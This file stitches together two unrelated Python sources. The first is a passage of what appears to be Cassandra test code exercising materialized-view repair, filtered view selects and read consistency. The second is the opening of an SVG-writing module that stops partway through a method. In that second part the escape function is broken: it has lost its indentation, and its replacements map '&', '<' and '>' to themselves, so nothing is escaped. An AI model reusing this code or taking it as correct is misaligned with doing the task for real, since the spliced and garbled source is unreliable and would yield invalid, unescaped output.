    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))

    session.cluster.control_connection.wait_for_schema_agreement()

    # Set initial values TS=0, verify
    session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
                                    consistency_level=ConsistencyLevel.ALL))
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'a', 3.0]
    )

    # Newer timestamp on v2 only; the view row keeps its key but updates v2.
    session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
                                    consistency_level=ConsistencyLevel.ALL))
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'b', 3.0]
    )

    # change v's value and TS=3, tombstones v=1 and adds v=0 record
    session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
                                    consistency_level=ConsistencyLevel.ALL))

    assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")

    debug('Shutdown node2')
    node2.stop(wait_other_notice=True)

    # Write while node2 is down so replicas diverge.
    session.execute("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1")

    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'b', 3.0]
    )

    node2.start(wait_other_notice=True, wait_for_binary_proto=True)

    # We should get a digest mismatch
    query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
                            consistency_level=ConsistencyLevel.ALL)

    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), True)

    # We should not get a digest mismatch the second time
    query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)

    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), False)

    # Verify values one last time
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'b', 3.0],
        cl=ConsistencyLevel.ALL
    )
def check_trace_events(self, trace, expect_digest):
    """Fail the test if the trace's digest-mismatch evidence does not match expectations.

    Scans the query trace for a read-repair digest mismatch event and calls
    self.fail() when one is found but not expected, or expected but absent.
    """
    # Trace messages of interest look like:
    # Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
    regex = r"Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey"
    found_mismatch = False
    for event in trace.events:
        # re.match anchors at the start of the description, matching the prefix.
        if re.match(regex, event.description):
            found_mismatch = True
            break
    if found_mismatch and not expect_digest:
        self.fail("Encountered digest mismatch when we shouldn't")
    if expect_digest and not found_mismatch:
        self.fail("Didn't find digest mismatch")
def simple_repair_test(self):
    """
    Test that a materialized view is consistent after a simple repair.

    Writes while node2 is down (hints disabled), confirms CL=ALL reads are
    unavailable, then repairs and verifies the view at CL=ONE.
    """
    session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
    node1, node2, node3 = self.cluster.nodelist()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    session.cluster.control_connection.wait_for_schema_agreement()

    debug('Shutdown node2')
    node2.stop(wait_other_notice=True)

    for i in xrange(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))

    self._replay_batchlogs()

    debug('Verify the data in the MV with CL=ONE')
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
    for i in xrange(1000):
        statement = SimpleStatement(
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            consistency_level=ConsistencyLevel.ALL
        )
        # node2 is down, so CL=ALL cannot be satisfied.
        assert_unavailable(
            session.execute,
            statement
        )

    debug('Start node2, and repair')
    node2.start(wait_other_notice=True, wait_for_binary_proto=True)
    node1.repair()

    debug('Verify the data in the MV with CL=ONE. All should be available now.')
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.ONE
        )
def base_replica_repair_test(self):
    """
    Test that a materialized view is consistent after the repair of the base replica.

    Wipes node1's data entirely, then repairs only the base table on node1
    and checks the view is rebuilt through base-to-view replication.
    """
    self.prepare(rf=3)
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    session.cluster.control_connection.wait_for_schema_agreement()

    debug('Write initial data')
    for i in xrange(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))

    self._replay_batchlogs()

    debug('Verify the data in the MV with CL=ALL')
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.ALL
        )

    debug('Shutdown node1')
    node1.stop(wait_other_notice=True)
    debug('Delete node1 data')
    node1.clear(clear_all=True)
    debug('Restarting node1')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)

    # Isolate node1 so reads can only be served from its (now empty) data.
    debug('Shutdown node2 and node3')
    node2.stop(wait_other_notice=True)
    node3.stop(wait_other_notice=True)

    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')

    debug('Verify that there is no data on node1')
    for i in xrange(1000):
        assert_none(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i)
        )

    debug('Restarting node2 and node3')
    node2.start(wait_other_notice=True, wait_for_binary_proto=True)
    node3.start(wait_other_notice=True, wait_for_binary_proto=True)

    # Just repair the base replica
    node1.nodetool("repair ks t")

    debug('Verify data with cl=ALL')
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
def complex_repair_test(self):
    """
    Test that a materialized view is consistent after a more complex repair.

    Creates two disjoint replica groups with divergent data (old data with
    i, new data with i*2), lets batchlogs expire, then runs a global repair
    and verifies the older-timestamped data wins at QUORUM.
    """
    session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
    node1, node2, node3, node4, node5 = self.cluster.nodelist()

    # we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
    session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
                    "WITH gc_grace_seconds = 5")
    session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    session.cluster.control_connection.wait_for_schema_agreement()

    debug('Shutdown node2 and node3')
    node2.stop()
    node3.stop(wait_other_notice=True)

    debug('Write initial data to node1 (will be replicated to node4 and node5)')
    for i in xrange(1000):
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))

    debug('Verify the data in the MV on node1 with CL=ONE')
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    debug('Shutdown node1, node4 and node5')
    node1.stop()
    node4.stop()
    node5.stop()

    debug('Start nodes 2 and 3')
    node2.start()
    node3.start(wait_other_notice=True, wait_for_binary_proto=True)

    session2 = self.patient_cql_connection(node2)

    debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
    for i in xrange(1000):
        assert_none(
            session2,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
        )

    debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
    for i in xrange(1000):
        # we write i*2 as value, instead of i
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))

    debug('Verify the new data in the MV on node2 with CL=ONE')
    for i in xrange(1000):
        v = i * 2
        assert_one(
            session2,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
            [v, v, 'a', 3.0]
        )

    debug('Wait for batchlogs to expire from node2 and node3')
    time.sleep(5)

    debug('Start remaining nodes')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    node4.start(wait_other_notice=True, wait_for_binary_proto=True)
    node5.start(wait_other_notice=True, wait_for_binary_proto=True)

    session = self.patient_cql_connection(node1)

    debug('Read data from MV at QUORUM (old data should be returned)')
    for i in xrange(1000):
        assert_one(
            session,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.QUORUM
        )

    debug('Run global repair on node1')
    node1.repair()

    debug('Read data from MV at quorum (new data should be returned after repair)')
    for i in xrange(1000):
        v = i * 2
        assert_one(
            session,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
            [v, v, 'a', 3.0],
            cl=ConsistencyLevel.QUORUM
        )
def really_complex_repair_test(self):
    """
    Test that a materialized view is consistent after a more complex repair.

    Like complex_repair_test but with a compound primary key and row-level
    deletes: after repair the deletes issued on the second replica group
    must shadow the original rows at QUORUM.
    """
    session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
    node1, node2, node3, node4, node5 = self.cluster.nodelist()

    # we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
    # NOTE(review): the statement actually sets gc_grace_seconds = 1, not 5 — confirm intent.
    session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
                    "WITH gc_grace_seconds = 1")
    session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
                     "v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))

    session.cluster.control_connection.wait_for_schema_agreement()

    debug('Shutdown node2 and node3')
    node2.stop(wait_other_notice=True)
    node3.stop(wait_other_notice=True)

    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
    self._replay_batchlogs()

    debug('Verify the data in the MV on node1 with CL=ONE')
    assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])

    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
    session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
    self._replay_batchlogs()

    debug('Verify the data in the MV on node1 with CL=ONE')
    assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])

    session.shutdown()

    debug('Shutdown node1, node4 and node5')
    node1.stop()
    node4.stop()
    node5.stop()

    debug('Start nodes 2 and 3')
    node2.start()
    node3.start(wait_other_notice=True, wait_for_binary_proto=True)

    session2 = self.patient_cql_connection(node2)
    session2.execute('USE ks')

    debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")

    debug('Write new data in node2 that overlap those in node1')
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
    self._replay_batchlogs()

    assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])

    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
    session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
    self._replay_batchlogs()

    assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])

    debug("Composite delete of everything")
    session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
    session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
    self._replay_batchlogs()

    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")

    debug('Wait for batchlogs to expire from node2 and node3')
    time.sleep(5)

    debug('Start remaining nodes')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    node4.start(wait_other_notice=True, wait_for_binary_proto=True)
    node5.start(wait_other_notice=True, wait_for_binary_proto=True)

    # at this point the data isn't repaired so we have an inconsistency.
    # this value should return None
    assert_all(
        session2,
        "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
        cl=ConsistencyLevel.QUORUM
    )

    debug('Run global repair on node1')
    node1.repair()

    # After repair the deletes win and the old rows are gone at QUORUM.
    assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def complex_mv_select_statements_test(self):
    """
    Test complex MV select statements
    @jira_ticket CASSANDRA-9664

    For each candidate view primary-key layout, creates a filtered view
    (a = 1 AND c = 1), then exercises inserts/updates/deletes that do and
    do not match the filter, verifying the view contents each time.
    """
    cluster = self.cluster
    cluster.populate(3).start()
    node1 = cluster.nodelist()[0]
    session = self.patient_cql_connection(node1)

    debug("Creating keyspace")
    session.execute("CREATE KEYSPACE mvtest WITH replication = "
                    "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
    session.execute('USE mvtest')

    # All legal orderings/groupings of (a, b, c) as a view primary key.
    mv_primary_keys = ["((a, b), c)",
                       "((b, a), c)",
                       "(a, b, c)",
                       "(c, b, a)",
                       "((c, a), b)"]

    for mv_primary_key in mv_primary_keys:
        # Fresh table + prepared statements per iteration (dropped at the end).
        session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")

        insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
        update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
        delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
        delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")

        session.cluster.control_connection.wait_for_schema_agreement()

        # Seed rows; only those with a = 1 and c = 1 satisfy the view filter.
        rows = [(0, 0, 0, 0),
                (0, 0, 1, 0),
                (0, 1, 0, 0),
                (0, 1, 1, 0),
                (1, 0, 0, 0),
                (1, 0, 1, 0),
                (1, 1, -1, 0),
                (1, 1, 0, 0),
                (1, 1, 1, 0)]

        for row in rows:
            session.execute(insert_stmt, row)

        debug("Testing MV primary key: {}".format(mv_primary_key))

        session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
                        "a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
        # Give the view build a moment to finish before querying.
        time.sleep(3)

        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # insert new rows that does not match the filter
        session.execute(insert_stmt, (0, 0, 1, 0))
        session.execute(insert_stmt, (1, 1, 0, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # insert new row that does match the filter
        session.execute(insert_stmt, (1, 2, 1, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # update rows that does not match the filter
        # (update_stmt parameter order is (d, a, b, c))
        session.execute(update_stmt, (1, 1, -1, 0))
        session.execute(update_stmt, (0, 1, 1, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # update a row that does match the filter
        session.execute(update_stmt, (2, 1, 1, 1))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete rows that does not match the filter
        session.execute(delete_stmt1, (1, 1, -1))
        session.execute(delete_stmt1, (2, 0, 1))
        session.execute(delete_stmt2, (0,))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete a row that does match the filter
        session.execute(delete_stmt1, (1, 1, 1))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete a partition that matches the filter
        session.execute(delete_stmt2, (1,))
        assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)

        # Cleanup
        session.execute("DROP MATERIALIZED VIEW mv")
        session.execute("DROP TABLE test")
# For read verification: classification of a single row's state when the
# view is compared against the expected base-table contents.
class MutationPresence(Enum):
    match = 1      # view row agrees with the expected value
    extra = 2      # view row present but with an unexpected value
    missing = 3    # expected view row not found
    excluded = 4   # row was overwritten/excluded; absence is correct
    unknown = 5    # result did not fit any of the above
class MM(object):
    """Base class for read-verification results; subclasses set mp and may report details via out()."""

    # MutationPresence classification; set by subclass constructors.
    mp = None

    def out(self):
        # Human-readable detail message; None means nothing to report.
        pass
class Match(MM):
    """Row found with the expected value — nothing to report."""

    def __init__(self):
        self.mp = MutationPresence.match

    def out(self):
        return None
class Extra(MM):
    """Row found but with a value other than the expected one."""

    expecting = None  # value that should have been present
    value = None      # value actually observed
    row = None        # the row (tuple) that was read

    def __init__(self, expecting, value, row):
        self.mp = MutationPresence.extra
        self.expecting = expecting
        self.value = value
        self.row = row

    def out(self):
        return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
    """Expected row was not found in the view."""

    value = None  # the expected value (unused by out(); kept for inspection)
    row = None    # identifier of the missing row

    def __init__(self, value, row):
        self.mp = MutationPresence.missing
        self.value = value
        self.row = row

    def out(self):
        # NOTE(review): only row is reported; value is stored but never printed.
        return "Missing. At {}".format(self.row)
class Excluded(MM):
    """Row correctly absent (its key was overwritten by a later write)."""

    def __init__(self):
        self.mp = MutationPresence.excluded

    def out(self):
        return None
class Unknown(MM):
    """Result did not match any recognised classification."""

    def __init__(self):
        self.mp = MutationPresence.unknown

    def out(self):
        return None
# Consistency levels used by the concurrent read/write helpers below.
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM

# Lightweight record describing one base-table row: (a, b) keys plus values c, d.
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
    """Deterministically map sequence number i to a SimpleRow spread over num_partitions partitions."""
    # NOTE(review): this file targets Python 2 (xrange, print statement), so
    # `/` here is integer floor division; a Python 3 port would make b a float.
    return SimpleRow(a=i % num_partitions, b=(i % 400) / num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
    """Worker entry point: open its own cluster connection to *ip* and verify
    rows [start, end), pushing one MM classification per row onto *queue*.

    @param rows dict mapping (a, b) -> latest sequence number written for that key
    """

    def execute_query(session, select_gi, i):
        # Classify the view's content for sequence number i.
        row = row_generate(i, num_partitions)
        if (row.a, row.b) in rows:
            base = rows[(row.a, row.b)]
        else:
            base = -1  # key never written (or tracking lost)
        gi = list(session.execute(select_gi, [row.c, row.a]))
        # base == i means i was the last write for this key, so the view
        # row for c=i should exist; otherwise it should have been replaced.
        if base == i and len(gi) == 1:
            return Match()
        elif base != i and len(gi) == 1:
            return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
        elif base == i and len(gi) == 0:
            return Missing(base, i)
        elif base != i and len(gi) == 0:
            return Excluded()
        else:
            return Unknown()

    try:
        cluster = Cluster([ip])
        session = cluster.connect()
        select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
        select_gi.consistency_level = readConsistency

        for i in range(start, end):
            ret = execute_query(session, select_gi, i)
            queue.put_nowait(ret)
    except Exception as e:
        # Best effort: report the error on stdout (Python 2 print statement)
        # rather than crashing the worker thread.
        print str(e)
        queue.close()
@since('3.0')
@skipIf(sys.platform == 'win32', 'Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
    """Stress-tests read consistency of a materialized view under async writes.

    Writes rows to a base table while (and before) the view exists, replays
    batchlogs, then verifies every row through the view from worker processes.
    """

    def prepare(self, user_table=False):
        """Start a 3-node cluster and reset the per-run bookkeeping state."""
        cluster = self.cluster
        cluster.populate(3).start()
        node2 = cluster.nodelist()[1]
        # Keep the status of async requests
        self.exception_type = collections.Counter()
        self.num_request_done = 0
        self.counts = {}
        for mp in MutationPresence:
            self.counts[mp] = 0
        self.rows = {}
        self.update_stats_every = 100
        debug("Set to talk to node 2")
        self.session = self.patient_cql_connection(node2)
        return self.session

    def _print_write_status(self, row):
        """Overwrite the status line with write progress and error counts."""
        output = "\r{}".format(row)
        for key in self.exception_type.keys():
            output = "{} ({}: {})".format(output, key, self.exception_type[key])
        sys.stdout.write(output)
        sys.stdout.flush()

    def _print_read_status(self, row):
        """Overwrite the status line with read-verification tallies."""
        if self.counts[MutationPresence.unknown] == 0:
            sys.stdout.write(
                "\rOn {}; match: {}; extra: {}; missing: {}".format(
                    row,
                    self.counts[MutationPresence.match],
                    self.counts[MutationPresence.extra],
                    self.counts[MutationPresence.missing])
            )
        else:
            sys.stdout.write(
                "\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
                    row,
                    self.counts[MutationPresence.match],
                    self.counts[MutationPresence.extra],
                    self.counts[MutationPresence.missing],
                    # BUG FIX: was MutationPresence.unkown (typo) -- raised
                    # AttributeError the first time an Unknown result occurred.
                    self.counts[MutationPresence.unknown])
            )
        sys.stdout.flush()

    def _do_row(self, insert_stmt, i, num_partitions):
        """Asynchronously insert row i, tracking completion and errors."""
        # Error callback for async requests
        def handle_errors(row, exc):
            self.num_request_done += 1
            try:
                name = type(exc).__name__
                self.exception_type[name] += 1
            except Exception as e:
                print(traceback.format_exception_only(type(e), e))

        # Success callback for async requests
        def success_callback(row):
            self.num_request_done += 1
            if i % self.update_stats_every == 0:
                self._print_write_status(i)

        row = row_generate(i, num_partitions)
        # Renamed from 'async': a reserved keyword since Python 3.7.
        future = self.session.execute_async(insert_stmt, row)
        errors = partial(handle_errors, row)
        future.add_callbacks(success_callback, errors)

    def _populate_rows(self):
        """Snapshot the base table into self.rows as (a, b) -> c."""
        statement = SimpleStatement(
            "SELECT a, b, c FROM mvtest.test1",
            consistency_level=readConsistency
        )
        data = self.session.execute(statement)
        for row in data:
            self.rows[(row.a, row.b)] = row.c

    def single_partition_consistent_reads_after_write_test(self):
        """
        Tests consistency of multiple writes to a single partition

        @jira_ticket CASSANDRA-10981
        """
        self._consistent_reads_after_write_test(1)

    def multi_partition_consistent_reads_after_write_test(self):
        """
        Tests consistency of multiple writes to a multiple partitions

        @jira_ticket CASSANDRA-10981
        """
        self._consistent_reads_after_write_test(20)

    def _consistent_reads_after_write_test(self, num_partitions):
        session = self.prepare()
        [node1, node2, node3] = self.cluster.nodelist()

        # Test config
        lower = 0
        upper = 100000
        processes = 4
        queues = [None] * processes
        # Explicit integer division: '/' relied on Python 2 semantics.
        eachProcess = (upper - lower) // processes

        debug("Creating schema")
        session.execute(
            ("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
             "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
        )
        session.execute(
            "CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
        )
        session.cluster.control_connection.wait_for_schema_agreement()

        insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
        insert1.consistency_level = writeConsistency

        # Write the first 10% before the view exists, the rest after, so the
        # view is built partly from existing data and partly from live writes.
        debug("Writing data to base table")
        for i in range(upper // 10):
            self._do_row(insert1, i, num_partitions)

        debug("Creating materialized view")
        session.execute(
            ('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
             'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
             'c IS NOT NULL PRIMARY KEY (c,a,b)')
        )
        session.cluster.control_connection.wait_for_schema_agreement()

        debug("Writing more data to base table")
        for i in range(upper // 10, upper):
            self._do_row(insert1, i, num_partitions)

        # Wait that all requests are done
        while self.num_request_done < upper:
            time.sleep(1)

        debug("Making sure all batchlogs are replayed on node1")
        node1.nodetool("replaybatchlog")
        debug("Making sure all batchlogs are replayed on node2")
        node2.nodetool("replaybatchlog")
        debug("Making sure all batchlogs are replayed on node3")
        node3.nodetool("replaybatchlog")

        debug("Finished writes, now verifying reads")
        self._populate_rows()

        # Fan the verification range out over worker processes; the last
        # worker absorbs the remainder.
        for i in range(processes):
            start = lower + (eachProcess * i)
            if i == processes - 1:
                end = upper
            else:
                end = lower + (eachProcess * (i + 1))
            q = Queue()
            node_ip = self.get_ip_from_node(node2)
            p = Process(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
            p.start()
            queues[i] = q

        # Drain results in row order: row i was produced by worker i % processes.
        for i in range(lower, upper):
            if i % 100 == 0:
                self._print_read_status(i)
            mm = queues[i % processes].get()
            if not mm.out() is None:
                sys.stdout.write("\r{}\n" .format(mm.out()))
            self.counts[mm.mp] += 1

        self._print_read_status(upper)
        sys.stdout.write("\n")
        sys.stdout.flush()
|
# -*- coding: utf-8 -*-
# Copyright 2011 Takeshi KOMIYA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import cStringIO
def _escape(s):
s = str(s)
return s.replace("&", "&").replace("<", "<").replace(">", ">")
def _quote(s):
    """Return `s` escaped and wrapped in double quotes for use as an
    XML attribute value.

    NOTE(review): the replacement target had been garbled into a bare
    triple-quote by extraction (a syntax error); restored to '&quot;'.
    """
    return '"%s"' % _escape(s).replace('"', '&quot;')
class base(object):
    """Base class for SVG elements.

    Holds optional text content, child elements and an attribute dict,
    and serializes itself (recursively) to XML via to_xml().
    """
    def __init__(self, *args, **kwargs):
        self.text = None       # optional text content of the element
        self.elements = []     # child elements, serialized in insertion order
        self.attributes = {}   # XML attribute name -> value
        for key, value in kwargs.items():
            self.add_attribute(key, value)

    def add_attribute(self, key, value):
        """Set an attribute; a `set_<key>` hook wins, else store the value
        with underscores mapped to hyphens (Python name -> XML name)."""
        setter = 'set_%s' % key
        if hasattr(self, setter):
            getattr(self, setter)(value)
        else:
            key = re.sub('_', '-', key)
            self.attributes[key] = value

    def addElement(self, element):
        """Append a child element."""
        self.elements.append(element)

    def set_text(self, text):
        # Hook used by add_attribute for the 'text' keyword.
        self.text = text

    def to_xml(self, io, level=0):
        """Write this element (and children) to `io`, indented by `level`."""
        # The XML tag name is simply the Python class name.
        clsname = self.__class__.__name__
        indent = ' ' * level
        io.write('%s<%s' % (indent, clsname))
        # Attributes are emitted sorted for deterministic output.
        for key in sorted(self.attributes):
            value = self.attributes[key]
            if value is not None:
                io.write(' %s=%s' % (_escape(key), _quote(value)))
        if self.elements == [] and self.text is None:
            io.write(" />\n")          # empty element
        elif self.text is not None:
            io.write(">%s</%s>\n" % (_escape(self.text), clsname))
        elif self.elements:
            io.write(">\n")
            for e in self.elements:
                e.to_xml(io, level + 1)
            io.write('%s</%s>\n' % (indent, clsname))
class element(base):
    """SVG element positioned at (x, y), with optional width/height."""
    def __init__(self, x, y, width=None, height=None, *args, **kwargs):
        super(element, self).__init__(*args, **kwargs)
        self.attributes['x'] = x
        self.attributes['y'] = y
        # Size attributes are only emitted when explicitly given.
        if width is not None:
            self.attributes['width'] = width
        if height is not None:
            self.attributes['height'] = height
class svg(base):
    """Root <svg> element; renders the whole document to a string."""
    def __init__(self, x, y, width, height):
        viewbox = "%d %d %d %d" % (x, y, width, height)
        super(svg, self).__init__(viewBox=viewbox)
        self.use_doctype = True  # emit the SVG 1.0 DOCTYPE by default
        self.add_attribute('xmlns', 'http://www.w3.org/2000/svg')

    def to_xml(self):
        # NOTE: overrides base.to_xml with a different signature -- the root
        # supplies its own buffer and returns the serialized document.
        io = cStringIO.StringIO()
        if self.use_doctype:
